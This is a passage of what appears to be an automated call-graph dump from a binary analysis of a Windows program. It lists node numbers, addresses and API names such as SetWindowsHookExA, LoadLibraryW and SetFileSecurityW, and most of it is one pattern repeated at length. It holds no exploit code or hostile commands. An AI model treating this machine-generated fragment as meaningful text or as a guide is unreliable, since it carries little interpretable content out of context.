27495->27533 27498 412ef7 ___initmbctable 27500 414963 27499->27500 27501 41498d 27499->27501 27502 414990 27500->27502 27503 414972 27500->27503 27501->27454 27502->27454 27534 414994 HeapAlloc 27503->27534 27505 41497c 27505->27502 27506 414981 HeapDestroy 27505->27506 27506->27501 27507->27464 27508->27470 27509->27478 27510->27484 27511->27490 27513 42a1b5 27512->27513 27535 4239c5 27513->27535 27521 412ee2 27521->27495 27532 413184 36 API calls _fast_error_exit 27521->27532 27522 42a1fc 27574 43030d 69 API calls ctype 27522->27574 27524->27455 27525->27458 27526->27462 27527->27469 27528->27472 27529->27477 27530->27483 27531->27489 27532->27495 27533->27498 27534->27505 27575 42d19f 27535->27575 27538 42d179 27539 42e088 ctype 24 API calls 27538->27539 27540 42d188 27539->27540 27541 42a1c7 27540->27541 27610 42dcf8 6 API calls 2 library calls 27540->27610 27543 42e5ce SetErrorMode SetErrorMode 27541->27543 27544 42d179 ctype 30 API calls 27543->27544 27545 42e5e6 27544->27545 27546 42d179 ctype 30 API calls 27545->27546 27547 42e5f5 27546->27547 27548 42e614 27547->27548 27611 42e480 27547->27611 27550 42d179 ctype 30 API calls 27548->27550 27551 42e619 27550->27551 27552 42e625 GetModuleHandleA 27551->27552 27639 423e66 27551->27639 27554 42e634 GetProcAddress 27552->27554 27555 42a1df 27552->27555 27554->27555 27555->27522 27556 405f9a 27555->27556 27557 405fa4 __EH_prolog 27556->27557 27658 40180a GetModuleHandleW GetProcAddress 27557->27658 27559 40600a 28418 408aaa 30 API calls ctype 27559->28418 27561 406011 28419 407d75 67 API calls 2 library calls 27561->28419 27562 405fb3 _strlen 27562->27559 27660 401784 27562->27660 27565 405fda 27665 403c31 27565->27665 27566 40601e 28420 424be6 146 API calls 2 library calls 27566->28420 27569 406035 27570 406043 27569->27570 27571 40603a SetFileSecurityW 27569->27571 28421 401bce 67 API calls 2 library calls 27570->28421 27571->27570 27573 406052 27573->27522 27574->27521 27576 42d179 ctype 30 API calls 27575->27576 27577 42d1a4 27576->27577 27580 42e088 27577->27580 27581 42e092 __EH_prolog 27580->27581 27582 42e0b7 27581->27582 27587 42e0c8 27581->27587 27591 42ddd3 TlsAlloc 27581->27591 27594 42db8c EnterCriticalSection 27582->27594 27586 42e0d7 27588 4239ca 27586->27588 27589 42e0dd 27586->27589 27604 42dc98 EnterCriticalSection 27587->27604 27588->27538 27609 42de78 9 API calls 2 library calls 27589->27609 27592 42de02 27591->27592 27593 42de07 InitializeCriticalSection 27591->27593 27592->27593 27593->27582 27598 42dbad 27594->27598 27595 42dc79 LeaveCriticalSection 27595->27587 27596 42dbf6 GlobalHandle GlobalUnlock GlobalReAlloc 27599 42dc1b 27596->27599 27597 42dbe6 GlobalAlloc 27597->27599 27598->27596 27598->27597 27603 42dc62 _TranslateName 27598->27603 27600 42dc42 GlobalLock 27599->27600 27601 42dc26 GlobalHandle GlobalLock 27599->27601 27602 42dc34 LeaveCriticalSection 27599->27602 27600->27603 27601->27602 27602->27600 27603->27595 27605 42dcaf 27604->27605 27606 42dcc0 LeaveCriticalSection 27604->27606 27605->27606 27607 42dcb4 TlsGetValue 27605->27607 27606->27586 27607->27606 27609->27588 27610->27541 27612 42d179 ctype 30 API calls 27611->27612 27613 42e4a3 GetModuleFileNameA 27612->27613 27614 42e4cb 27613->27614 27615 42e4d4 PathFindExtensionA 27614->27615 27645 42a382 RaiseException ctype 27614->27645 27617 42e4e8 27615->27617 27618 42e4ed 27615->27618 27646 42a382 RaiseException ctype 27617->27646 27647 42e451 PathFindFileNameA lstrlenA lstrcpynA 27618->27647 27621 42e507 27624 42e510 27621->27624 27648 42a382 RaiseException ctype 27621->27648 27623 42e523 27626 42e551 27623->27626 27650 428c25 35 API calls ctype 27623->27650 27624->27623 27649 4131c4 36 API calls 3 library calls 27624->27649 27627 42e591 27626->27627 27632 42e572 lstrcpyA 27626->27632 27629 42e596 lstrcatA 27627->27629 27630 42e5b4 27627->27630 27653 4131c4 36 API calls 3 library calls 27629->27653 27654 412f8a 36 API calls 2 library calls 27630->27654 27631 42e53f 27651 4131c4 36 API calls 3 library calls 27631->27651 27652 4131c4 36 API calls 3 library calls 27632->27652 27636 42e5c6 27636->27548 27637 42e587 27637->27627 27640 42d179 ctype 30 API calls 27639->27640 27641 423e6b 27640->27641 27642 423e93 27641->27642 27655 42d169 27641->27655 27642->27552 27647->27621 27649->27623 27650->27631 27651->27626 27652->27637 27653->27630 27654->27636 27656 42e088 ctype 24 API calls 27655->27656 27657 423e77 GetCurrentThreadId SetWindowsHookExA 27656->27657 27657->27642 27659 401839 27658->27659 27659->27562 27661 401792 _TranslateName 27660->27661 27662 401796 LoadLibraryW GetProcAddress 27660->27662 27661->27565 27663 4017c2 27662->27663 27663->27661 28422 412247 27663->28422 27666 403c3b __EH_prolog 27665->27666 28442 401d2e 27666->28442 27671 403c78 std::runtime_error::~runtime_error 28459 403ba9 27671->28459 27675 403c9a 28471 401fb3 27675->28471 27677 403caf 27678 403cbf std::runtime_error::~runtime_error 27677->27678 27679 403be3 37 API calls 27678->27679 27680 403cd1 27679->27680 27681 401fb3 ctype 37 API calls 27680->27681 27682 403ce3 27681->27682 27683 403cf0 std::runtime_error::~runtime_error 27682->27683 27684 403be3 37 API calls 27683->27684 27685 403d02 27684->27685 27686 401fb3 ctype 37 API calls 27685->27686 27687 403d14 27686->27687 27688 403d21 std::runtime_error::~runtime_error 27687->27688 27689 403be3 37 API calls 27688->27689 27690 403d33 27689->27690 27691 401fb3 ctype 37 API calls 27690->27691 27692 403d45 27691->27692 27693 403d52 std::runtime_error::~runtime_error 27692->27693 27694 403be3 37 API calls 27693->27694 27695 403d64 27694->27695 27696 401fb3 ctype 37 API calls 27695->27696 27697 403d76 27696->27697 27698 403d83 std::runtime_error::~runtime_error 27697->27698 27699 403be3 37 API calls 27698->27699 27700 403d95 27699->27700 27701 401fb3 ctype 37 API calls 27700->27701 27702 403da7 27701->27702 27703 403db4 std::runtime_error::~runtime_error 27702->27703 27704 403be3 37 API calls 27703->27704 27705 403dc6 27704->27705 27706 401fb3 ctype 37 API calls 27705->27706 27707 403dd8 27706->27707 27708 403de5 std::runtime_error::~runtime_error 27707->27708 27709 403be3 37 API calls 27708->27709 27710 403df7 27709->27710 27711 401fb3 ctype 37 API calls 27710->27711 27712 403e09 27711->27712 27713 403e16 std::runtime_error::~runtime_error 27712->27713 27714 403be3 37 API calls 27713->27714 27715 403e28 27714->27715 27716 401fb3 ctype 37 API calls 27715->27716 27717 403e3a 27716->27717 27718 403e47 std::runtime_error::~runtime_error 27717->27718 27719 403be3 37 API calls 27718->27719 27720 403e59 27719->27720 27721 401fb3 ctype 37 API calls 27720->27721 27722 403e6b 27721->27722 27723 403e78 std::runtime_error::~runtime_error 27722->27723 27724 403be3 37 API calls 27723->27724 27725 403e8a 27724->27725 27726 401fb3 ctype 37 API calls 27725->27726 27727 403e9c 27726->27727 27728 403ea9 std::runtime_error::~runtime_error 27727->27728 27729 403be3 37 API calls 27728->27729 27730 403ebb 27729->27730 27731 401fb3 ctype 37 API calls 27730->27731 27732 403ecd 27731->27732 27733 403eda std::runtime_error::~runtime_error 27732->27733 27734 403be3 37 API calls 27733->27734 27735 403eec 27734->27735 27736 401fb3 ctype 37 API calls 27735->27736 27737 403efe 27736->27737 27738 403f0b std::runtime_error::~runtime_error 27737->27738 27739 403be3 37 API calls 27738->27739 27740 403f1d 27739->27740 27741 401fb3 ctype 37 API calls 27740->27741 27742 403f2f 27741->27742 27743 403f3c std::runtime_error::~runtime_error 27742->27743 27744 403be3 37 API calls 27743->27744 27745 403f4e 27744->27745 27746 401fb3 ctype 37 API calls 27745->27746 27747 403f60 std::runtime_error::~runtime_error 27746->27747 27748 403be3 37 API calls 27747->27748 27749 403f7f 27748->27749 27750 401fb3 ctype 37 API calls 27749->27750 27751 403f91 std::runtime_error::~runtime_error 27750->27751 27752 403be3 37 API calls 27751->27752 27753 403fb0 27752->27753 27754 401fb3 ctype 37 API calls 27753->27754 27755 403fc2 std::runtime_error::~runtime_error 27754->27755 27756 403be3 37 API calls 27755->27756 27757 403fe1 27756->27757 27758 401fb3 ctype 37 API calls 27757->27758 27759 403ff3 std::runtime_error::~runtime_error 27758->27759 27760 403be3 37 API calls 27759->27760 27761 404012 27760->27761 27762 401fb3 ctype 37 API calls 27761->27762 27763 404024 std::runtime_error::~runtime_error 27762->27763 27764 403be3 37 API calls 27763->27764 27765 404043 27764->27765 27766 401fb3 ctype 37 API calls 27765->27766 27767 404055 std::runtime_error::~runtime_error 27766->27767 27768 403be3 37 API calls 27767->27768 27769 404074 27768->27769 27770 401fb3 ctype 37 API calls 27769->27770 27771 404086 std::runtime_error::~runtime_error 27770->27771 27772 403be3 37 API calls 27771->27772 27773 4040a5 27772->27773 27774 401fb3 ctype 37 API calls 27773->27774 27775 4040b7 std::runtime_error::~runtime_error 27774->27775 27776 403be3 37 API calls 27775->27776 27777 4040d6 27776->27777 27778 401fb3 ctype 37 API calls 27777->27778 27779 4040e8 std::runtime_error::~runtime_error 27778->27779 27780 403be3 37 API calls 27779->27780 27781 404107 27780->27781 27782 401fb3 ctype 37 API calls 27781->27782 27783 404119 std::runtime_error::~runtime_error 27782->27783 27784 403be3 37 API calls 27783->27784 27785 404138 27784->27785 27786 401fb3 ctype 37 API calls 27785->27786 27787 40414a std::runtime_error::~runtime_error 27786->27787 27788 403be3 37 API calls 27787->27788 27789 404169 27788->27789 27790 401fb3 ctype 37 API calls 27789->27790 27791 40417b std::runtime_error::~runtime_error 27790->27791 27792 403be3 37 API calls 27791->27792 27793 40419a 27792->27793 27794 401fb3 ctype 37 API calls 27793->27794 27795 4041ac std::runtime_error::~runtime_error 27794->27795 27796 403be3 37 API calls 27795->27796 27797 4041cb 27796->27797 27798 401fb3 ctype 37 API calls 27797->27798 27799 4041dd std::runtime_error::~runtime_error 27798->27799 27800 403be3 37 API calls 27799->27800 27801 4041fc 27800->27801 27802 401fb3 ctype 37 API calls 27801->27802 27803 40420e std::runtime_error::~runtime_error 27802->27803 27804 403be3 37 API calls 27803->27804 27805 40422d 27804->27805 27806 401fb3 ctype 37 API calls 27805->27806 27807 40423f std::runtime_error::~runtime_error 27806->27807 27808 403be3 37 API calls 27807->27808 27809 40425e 27808->27809 27810 401fb3 ctype 37 API calls 27809->27810 27811 404270 std::runtime_error::~runtime_error 27810->27811 27812 403be3 37 API calls 27811->27812 27813 40428f 27812->27813 27814 401fb3 ctype 37 API calls 27813->27814 27815 4042a1 std::runtime_error::~runtime_error 27814->27815 27816 403be3 37 API calls 27815->27816 27817 4042c0 27816->27817 27818 401fb3 ctype 37 API calls 27817->27818 27819 4042d2 std::runtime_error::~runtime_error 27818->27819 27820 403be3 37 API calls 27819->27820 27821 4042f1 27820->27821 27822 401fb3 ctype 37 API calls 27821->27822 27823 404303 std::runtime_error::~runtime_error 27822->27823 27824 403be3 37 API calls 27823->27824 27825 404322 27824->27825 27826 401fb3 ctype 37 API calls 27825->27826 27827 404334 std::runtime_error::~runtime_error 27826->27827 27828 403be3 37 API calls 27827->27828 27829 404353 27828->27829 27830 401fb3 ctype 37 API calls 27829->27830 27831 404365 std::runtime_error::~runtime_error 27830->27831 27832 403be3 37 API calls 27831->27832 27833 404384 27832->27833 27834 401fb3 ctype 37 API calls 27833->27834 27835 404396 std::runtime_error::~runtime_error 27834->27835 27836 403be3 37 API calls 27835->27836 27837 4043b5 27836->27837 27838 401fb3 ctype 37 API calls 27837->27838 27839 4043c7 std::runtime_error::~runtime_error 27838->27839 27840 403be3 37 API calls 27839->27840 27841 4043e6 27840->27841 27842 401fb3 ctype 37 API calls 27841->27842 27843 4043f8 std::runtime_error::~runtime_error 27842->27843 27844 403be3 37 API calls 27843->27844 27845 404417 27844->27845 27846 401fb3 ctype 37 API calls 27845->27846 27847 404429 std::runtime_error::~runtime_error 27846->27847 27848 403be3 37 API calls 27847->27848 27849 404448 27848->27849 27850 401fb3 ctype 37 API calls 27849->27850 27851 40445a std::runtime_error::~runtime_error 27850->27851 27852 403be3 37 API calls 27851->27852 27853 404479 27852->27853 27854 401fb3 ctype 37 API calls 27853->27854 27855 40448b std::runtime_error::~runtime_error 27854->27855 27856 403be3 37 API calls 27855->27856 27857 4044aa 27856->27857 27858 401fb3 ctype 37 API calls 27857->27858 27859 4044bc std::runtime_error::~runtime_error 27858->27859 27860 403be3 37 API calls 27859->27860 27861 4044db 27860->27861 27862 401fb3 ctype 37 API calls 27861->27862 27863 4044ed std::runtime_error::~runtime_error 27862->27863 27864 403be3 37 API calls 27863->27864 27865 40450c 27864->27865 27866 401fb3 ctype 37 API calls 27865->27866 27867 40451e std::runtime_error::~runtime_error 27866->27867 27868 403be3 37 API calls 27867->27868 27869 40453d 27868->27869 27870 401fb3 ctype 37 API calls 27869->27870 27871 40454f std::runtime_error::~runtime_error 27870->27871 27872 403be3 37 API calls 27871->27872 27873 40456e 27872->27873 27874 401fb3 ctype 37 API calls 27873->27874 27875 404580 std::runtime_error::~runtime_error 27874->27875 27876 403be3 37 API calls 27875->27876 27877 40459f 27876->27877 27878 401fb3 ctype 37 API calls 27877->27878 27879 4045b1 std::runtime_error::~runtime_error 27878->27879 27880 403be3 37 API calls 27879->27880 27881 4045d0 27880->27881 27882 401fb3 ctype 37 API calls 27881->27882 27883 4045e2 std::runtime_error::~runtime_error 27882->27883 27884 403be3 37 API calls 27883->27884 27885 404601 27884->27885 27886 401fb3 ctype 37 API calls 27885->27886 27887 404613 std::runtime_error::~runtime_error 27886->27887 27888 403be3 37 API calls 27887->27888 27889 404632 27888->27889 27890 401fb3 ctype 37 API calls 27889->27890 27891 404644 std::runtime_error::~runtime_error 27890->27891 27892 403be3 37 API calls 27891->27892 27893 404663 27892->27893 27894 401fb3 ctype 37 API calls 27893->27894 27895 404675 std::runtime_error::~runtime_error 27894->27895 27896 403be3 37 API calls 27895->27896 27897 404694 27896->27897 27898 401fb3 ctype 37 API calls 27897->27898 27899 4046a6 std::runtime_error::~runtime_error 27898->27899 27900 403be3 37 API calls 27899->27900 27901 4046c5 27900->27901 27902 401fb3 ctype 37 API calls 27901->27902 27903 4046d7 std::runtime_error::~runtime_error 27902->27903 27904 403be3 37 API calls 27903->27904 27905 4046f6 27904->27905 27906 401fb3 ctype 37 API calls 27905->27906 27907 404708 std::runtime_error::~runtime_error 27906->27907 27908 403be3 37 API calls 27907->27908 27909 404727 27908->27909 27910 401fb3 ctype 37 API calls 27909->27910 27911 404739 std::runtime_error::~runtime_error 27910->27911 27912 403be3 37 API calls 27911->27912 27913 404758 27912->27913 27914 401fb3 ctype 37 API calls 27913->27914 27915 40476a std::runtime_error::~runtime_error 27914->27915 27916 403be3 37 API calls 27915->27916 27917 404789 27916->27917 27918 401fb3 ctype 37 API calls 27917->27918 27919 40479b std::runtime_error::~runtime_error 27918->27919 27920 403be3 37 API calls 27919->27920 27921 4047ba 27920->27921 27922 401fb3 ctype 37 API calls 27921->27922 27923 4047cc std::runtime_error::~runtime_error 27922->27923 27924 403be3 37 API calls 27923->27924 27925 4047eb 27924->27925 27926 401fb3 ctype 37 API calls 27925->27926 27927 4047fd std::runtime_error::~runtime_error 27926->27927 27928 403be3 37 API calls 27927->27928 27929 40481c 27928->27929 27930 401fb3 ctype 37 API calls 27929->27930 27931 40482e std::runtime_error::~runtime_error 27930->27931 27932 403be3 37 API calls 27931->27932 27933 40484d 27932->27933 27934 401fb3 ctype 37 API calls 27933->27934 27935 40485f std::runtime_error::~runtime_error 27934->27935 27936 403be3 37 API calls 27935->27936 27937 40487e 27936->27937 27938 401fb3 ctype 37 API calls 27937->27938 27939 404890 std::runtime_error::~runtime_error 27938->27939 27940 403be3 37 API calls 27939->27940 27941 4048af 27940->27941 27942 401fb3 ctype 37 API calls 27941->27942 27943 4048c1 std::runtime_error::~runtime_error 27942->27943 27944 403be3 37 API calls 27943->27944 27945 4048e0 27944->27945 27946 401fb3 ctype 37 API calls 27945->27946 27947 4048f2 std::runtime_error::~runtime_error 27946->27947 27948 403be3 37 API calls 27947->27948 27949 404911 27948->27949 27950 401fb3 ctype 37 API calls 27949->27950 27951 404923 std::runtime_error::~runtime_error 27950->27951 27952 403be3 37 API calls 27951->27952 27953 404942 27952->27953 27954 401fb3 ctype 37 API calls 27953->27954 27955 404954 std::runtime_error::~runtime_error 27954->27955 27956 403be3 37 API calls 27955->27956 27957 404973 27956->27957 27958 401fb3 ctype 37 API calls 27957->27958 27959 404985 std::runtime_error::~runtime_error 27958->27959 27960 403be3 37 API calls 27959->27960 27961 4049a4 27960->27961 27962 401fb3 ctype 37 API calls 27961->27962 27963 4049b6 std::runtime_error::~runtime_error 27962->27963 27964 403be3 37 API calls 27963->27964 27965 4049d5 27964->27965 27966 401fb3 ctype 37 API calls 27965->27966 27967 4049e7 std::runtime_error::~runtime_error 27966->27967 27968 403be3 37 API calls 27967->27968 27969 404a06 27968->27969 27970 401fb3 ctype 37 API calls 27969->27970 27971 404a18 std::runtime_error::~runtime_error 27970->27971 27972 403be3 37 API calls 27971->27972 27973 404a37 27972->27973 27974 401fb3 ctype 37 API calls 27973->27974 27975 404a49 std::runtime_error::~runtime_error 27974->27975 27976 403be3 37 API calls 27975->27976 27977 404a68 27976->27977 27978 401fb3 ctype 37 API calls 27977->27978 27979 404a7a std::runtime_error::~runtime_error 27978->27979 27980 403be3 37 API calls 27979->27980 27981 404a99 27980->27981 27982 401fb3 ctype 37 API calls 27981->27982 27983 404aab std::runtime_error::~runtime_error 27982->27983 27984 403be3 37 API calls 27983->27984 27985 404aca 27984->27985 27986 401fb3 ctype 37 API calls 27985->27986 27987 404adc std::runtime_error::~runtime_error 27986->27987 27988 403be3 37 API calls 27987->27988 27989 404afb 27988->27989 27990 401fb3 ctype 37 API calls 27989->27990 27991 404b0d std::runtime_error::~runtime_error 27990->27991 27992 403be3 37 API calls 27991->27992 27993 404b2c 27992->27993 27994 401fb3 ctype 37 API calls 27993->27994 27995 404b3e std::runtime_error::~runtime_error 27994->27995 27996 403be3 37 API calls 27995->27996 27997 404b5d 27996->27997 27998 401fb3 ctype 37 API calls 27997->27998 27999 404b6f std::runtime_error::~runtime_error 27998->27999 28000 403be3 37 API calls 27999->28000 28001 404b8e 28000->28001 28002 401fb3 ctype 37 API calls 28001->28002 28003 404ba0 std::runtime_error::~runtime_error 28002->28003 28004 403be3 37 API calls 28003->28004 28005 404bbf 28004->28005 28006 401fb3 ctype 37 API calls 28005->28006 28007 404bd1 std::runtime_error::~runtime_error 28006->28007 28008 403be3 37 API calls 28007->28008 28009 404bf0 28008->28009 28010 401fb3 ctype 37 API calls 28009->28010 28011 404c02 std::runtime_error::~runtime_error 28010->28011 28012 403be3 37 API calls 28011->28012 28013 404c21 28012->28013 28014 401fb3 ctype 37 API calls 28013->28014 28015 404c33 std::runtime_error::~runtime_error 28014->28015 28016 403be3 37 API calls 28015->28016 28017 404c52 28016->28017 28018 401fb3 ctype 37 API calls 28017->28018 28019 404c64 std::runtime_error::~runtime_error 28018->28019 28020 403be3 37 API calls 28019->28020 28021 404c83 28020->28021 28022 401fb3 ctype 37 API calls 28021->28022 28023 404c95 std::runtime_error::~runtime_error 28022->28023 28024 403be3 37 API calls 28023->28024 28025 404cb4 28024->28025 28026 401fb3 ctype 37 API calls 28025->28026 28027 404cc6 std::runtime_error::~runtime_error 28026->28027 28028 403be3 37 API calls 28027->28028 28029 404ce5 28028->28029 28030 401fb3 ctype 37 API calls 28029->28030 28031 404cf7 std::runtime_error::~runtime_error 28030->28031 28032 403be3 37 API calls 28031->28032 28033 404d16 28032->28033 28034 401fb3 ctype 37 API calls 28033->28034 28035 404d28 std::runtime_error::~runtime_error 28034->28035 28036 403be3 37 API calls 28035->28036 28037 404d47 28036->28037 28038 401fb3 ctype 37 API calls 28037->28038 28039 404d59 std::runtime_error::~runtime_error 28038->28039 28040 403be3 37 API calls 28039->28040 28041 404d78 28040->28041 28042 401fb3 ctype 37 API calls 28041->28042 28043 404d8a std::runtime_error::~runtime_error 28042->28043 28044 403be3 37 API calls 28043->28044 28045 404da9 28044->28045 28046 401fb3 ctype 37 API calls 28045->28046 28047 404dbb std::runtime_error::~runtime_error 28046->28047 28048 403be3 37 API calls 28047->28048 28049 404dda 28048->28049 28050 401fb3 ctype 37 API calls 28049->28050 28051 404dec std::runtime_error::~runtime_error 28050->28051 28052 403be3 37 API calls 28051->28052 28053 404e0b 28052->28053 28054 401fb3 ctype 37 API calls 28053->28054 28055 404e1d std::runtime_error::~runtime_error 28054->28055 28056 403be3 37 API calls 28055->28056 28057 404e3c 28056->28057 28058 401fb3 ctype 37 API calls 28057->28058 28059 404e4e std::runtime_error::~runtime_error 28058->28059 28060 403be3 37 API calls 28059->28060 28061 404e6d 28060->28061 28062 401fb3 ctype 37 API calls 28061->28062 28063 404e7f std::runtime_error::~runtime_error 28062->28063 28064 403be3 37 API calls 28063->28064 28065 404e9e 28064->28065 28066 401fb3 ctype 37 API calls 28065->28066 28067 404eb0 std::runtime_error::~runtime_error 28066->28067 28068 403be3 37 API calls 28067->28068 28069 404ecf 28068->28069 28070 401fb3 ctype 37 API calls 28069->28070 28071 404ee1 std::runtime_error::~runtime_error 28070->28071 28072 403be3 37 API calls 28071->28072 28073 404f00 28072->28073 28074 401fb3 ctype 37 API calls 28073->28074 28075 404f12 std::runtime_error::~runtime_error 28074->28075 28076 403be3 37 API calls 28075->28076 28077 404f31 28076->28077 28078 401fb3 ctype 37 API calls 28077->28078 28079 404f43 std::runtime_error::~runtime_error 28078->28079 28080 403be3 37 API calls 28079->28080 28081 404f62 28080->28081 28082 401fb3 ctype 37 API calls 28081->28082 28083 404f74 std::runtime_error::~runtime_error 28082->28083 28084 403be3 37 API calls 28083->28084 28085 404f93 28084->28085 28086 401fb3 ctype 37 API calls 28085->28086 28087 404fa5 std::runtime_error::~runtime_error 28086->28087 28088 403be3 37 API calls 28087->28088 28089 404fc4 28088->28089 28090 401fb3 ctype 37 API calls 28089->28090 28091 404fd6 std::runtime_error::~runtime_error 28090->28091 28092 403be3 37 API calls 28091->28092 28093 404ff5 28092->28093 28094 401fb3 ctype 37 API calls 28093->28094 28095 405007 std::runtime_error::~runtime_error 28094->28095 28096 403be3 37 API calls 28095->28096 28097 405026 28096->28097 28098 401fb3 ctype 37 API calls 28097->28098 28099 405038 std::runtime_error::~runtime_error 28098->28099 28100 403be3 37 API calls 28099->28100 28101 405057 28100->28101 28102 401fb3 ctype 37 API calls 28101->28102 28103 405069 std::runtime_error::~runtime_error 28102->28103 28104 403be3 37 API calls 28103->28104 28105 405088 28104->28105 28106 401fb3 ctype 37 API calls 28105->28106 28107 40509a std::runtime_error::~runtime_error 28106->28107 28108 403be3 37 API calls 28107->28108 28109 4050b9 28108->28109 28110 401fb3 ctype 37 API calls 28109->28110 28111 4050cb std::runtime_error::~runtime_error 28110->28111 28112 403be3 37 API calls 28111->28112 28113 4050ea 28112->28113 28114 401fb3 ctype 37 API calls 28113->28114 28115 4050fc std::runtime_error::~runtime_error 28114->28115 28116 403be3 37 API calls 28115->28116 28117 40511b 28116->28117 28118 401fb3 ctype 37 API calls 28117->28118 28119 40512d std::runtime_error::~runtime_error 28118->28119 28120 403be3 37 API calls 28119->28120 28121 40514c 28120->28121 28122 401fb3 ctype 37 API calls 28121->28122 28123 40515e std::runtime_error::~runtime_error 28122->28123 28124 403be3 37 API calls 28123->28124 28125 40517d 28124->28125 28126 401fb3 ctype 37 API calls 28125->28126 28127 40518f std::runtime_error::~runtime_error 28126->28127 28128 403be3 37 API calls 28127->28128 28129 4051ae 28128->28129 28130 401fb3 ctype 37 API calls 28129->28130 28131 4051c0 std::runtime_error::~runtime_error 28130->28131 28132 403be3 37 API calls 28131->28132 28133 4051df 28132->28133 28134 401fb3 ctype 37 API calls 28133->28134 28135 4051f1 std::runtime_error::~runtime_error 28134->28135 28136 403be3 37 API calls 28135->28136 28137 405210 28136->28137 28138 401fb3 ctype 37 API calls 28137->28138 28139 405222 std::runtime_error::~runtime_error 28138->28139 28140 403be3 37 API calls 28139->28140 28141 405241 28140->28141 28142 401fb3 ctype 37 API calls 28141->28142 28143 405253 std::runtime_error::~runtime_error 28142->28143 28144 403be3 37 API calls 28143->28144 28145 405272 28144->28145 28146 401fb3 ctype 37 API calls 28145->28146 28147 405284 std::runtime_error::~runtime_error 28146->28147 28148 403be3 37 API calls 28147->28148 28149 4052a3 28148->28149 28150 401fb3 ctype 37 API calls 28149->28150 28151 4052b5 std::runtime_error::~runtime_error 28150->28151 28152 403be3 37 API calls 28151->28152 28153 4052d4 28152->28153 28154 401fb3 ctype 37 API calls 28153->28154 28155 4052e6 std::runtime_error::~runtime_error 28154->28155 28156 403be3 37 API calls 28155->28156 28157 405305 28156->28157 28158 401fb3 ctype 37 API calls 28157->28158 28159 405317 std::runtime_error::~runtime_error 28158->28159 28160 403be3 37 API calls 28159->28160 28161 405336 28160->28161 28162 401fb3 ctype 37 API calls 28161->28162 28163 405348 std::runtime_error::~runtime_error 28162->28163 28164 403be3 37 API calls 28163->28164 28165 405367 28164->28165 28166 401fb3 ctype 37 API calls 28165->28166 28167 405379 std::runtime_error::~runtime_error 28166->28167 28168 403be3 37 API calls 28167->28168 28169 405398 28168->28169 28170 401fb3 ctype 37 API calls 28169->28170 28171 4053aa std::runtime_error::~runtime_error 28170->28171 28172 403be3 37 API calls 28171->28172 28173 4053c9 28172->28173 28174 401fb3 ctype 37 API calls 28173->28174 28175 4053db std::runtime_error::~runtime_error 28174->28175 28176 403be3 37 API calls 28175->28176 28177 4053fa 28176->28177 28178 401fb3 ctype 37 API calls 28177->28178 28179 40540c std::runtime_error::~runtime_error 28178->28179 28180 403be3 37 API calls 28179->28180 28181 40542b 28180->28181 28182 401fb3 ctype 37 API calls 28181->28182 28183 40543d std::runtime_error::~runtime_error 28182->28183 28184 403be3 37 API calls 28183->28184 28185 40545c 28184->28185 28186 401fb3 ctype 37 API calls 28185->28186 28187 40546e std::runtime_error::~runtime_error 28186->28187 28188 403be3 37 API calls 28187->28188 28189 40548d 28188->28189 28190 401fb3 ctype 37 API calls 28189->28190 28191 40549f std::runtime_error::~runtime_error 28190->28191 28192 403be3 37 API calls 28191->28192 28193 4054be 28192->28193 28194 401fb3 ctype 37 API calls 28193->28194 28195 4054d0 std::runtime_error::~runtime_error 28194->28195 28196 403be3 37 API calls 28195->28196 28197 4054ef 28196->28197 28198 401fb3 ctype 37 API calls 28197->28198 28199 405501 std::runtime_error::~runtime_error 28198->28199 28200 403be3 37 API calls 28199->28200 28201 405520 28200->28201 28202 401fb3 ctype 37 API calls 28201->28202 28203 405532 std::runtime_error::~runtime_error 28202->28203 28204 403be3 37 API calls 28203->28204 28205 405551 28204->28205 28206 401fb3 ctype 37 API calls 28205->28206 28207 405563 std::runtime_error::~runtime_error 28206->28207 28208 403be3 37 API calls 28207->28208 28209 405582 28208->28209 28210 401fb3 ctype 37 API calls 28209->28210 28211 405594 std::runtime_error::~runtime_error 28210->28211 28212 403be3 37 API calls 28211->28212 28213 4055b3 28212->28213 28214 401fb3 ctype 37 API calls 28213->28214 28215 4055c5 std::runtime_error::~runtime_error 28214->28215 28216 403be3 37 API calls 28215->28216 28217 4055e4 28216->28217 28218 401fb3 ctype 37 API calls 28217->28218 28219 4055f6 std::runtime_error::~runtime_error 28218->28219 28220 403be3 37 API calls 28219->28220 28221 405615 28220->28221 28222 401fb3 ctype 37 API calls 28221->28222 28223 405627 std::runtime_error::~runtime_error 28222->28223 28224 403be3 37 API calls 28223->28224 28225 405646 28224->28225 28226 401fb3 ctype 37 API calls 28225->28226 28227 405658 std::runtime_error::~runtime_error 28226->28227 28228 403be3 37 API calls 28227->28228 28229 405677 28228->28229 28230 401fb3 ctype 37 API calls 28229->28230 28231 405689 std::runtime_error::~runtime_error 28230->28231 28232 403be3 37 API calls 28231->28232 28233 4056a8 28232->28233 28234 401fb3 ctype 37 API calls 28233->28234 28235 4056ba std::runtime_error::~runtime_error 28234->28235 28236 403be3 37 API calls 28235->28236 28237 4056d9 28236->28237 28238 401fb3 ctype 37 API calls 28237->28238 28239 4056eb std::runtime_error::~runtime_error 28238->28239 28240 403be3 37 API calls 28239->28240 28241 40570a 28240->28241 28242 401fb3 ctype 37 API calls 28241->28242 28243 40571c std::runtime_error::~runtime_error 28242->28243 28244 403be3 37 API calls 28243->28244 28245 40573b 28244->28245 28246 401fb3 ctype 37 API calls 28245->28246 28247 40574d std::runtime_error::~runtime_error 28246->28247 28248 403be3 37 API calls 28247->28248 28249 40576c 28248->28249 28250 401fb3 ctype 37 API calls 28249->28250 28251 40577e std::runtime_error::~runtime_error 28250->28251 28252 403be3 37 API calls 28251->28252 28253 40579d 28252->28253 28254 401fb3 ctype 37 API calls 28253->28254 28255 4057af std::runtime_error::~runtime_error 28254->28255 28256 403be3 37 API calls 28255->28256 28257 4057ce 28256->28257 28258 401fb3 ctype 37 API calls 28257->28258 28259 4057e0 std::runtime_error::~runtime_error 28258->28259 28260 403be3 37 API calls 28259->28260 28261 4057ff 28260->28261 28262 401fb3 ctype 37 API calls 28261->28262 28263 405811 std::runtime_error::~runtime_error 28262->28263 28264 403be3 37 API calls 28263->28264 28265 405830 28264->28265 28266 401fb3 ctype 37 API calls 28265->28266 28267 405842 std::runtime_error::~runtime_error 28266->28267 28268 403be3 37 API calls 28267->28268 28269 405861 28268->28269 28270 401fb3 ctype 37 API calls 28269->28270 28271 405873 std::runtime_error::~runtime_error 28270->28271 28272 403be3 37 API calls 28271->28272 28273 405892 28272->28273 28274 401fb3 ctype 37 API calls 28273->28274 28275 4058a4 std::runtime_error::~runtime_error 28274->28275 28276 403be3 37 API calls 28275->28276 28277 4058c3 28276->28277 28278 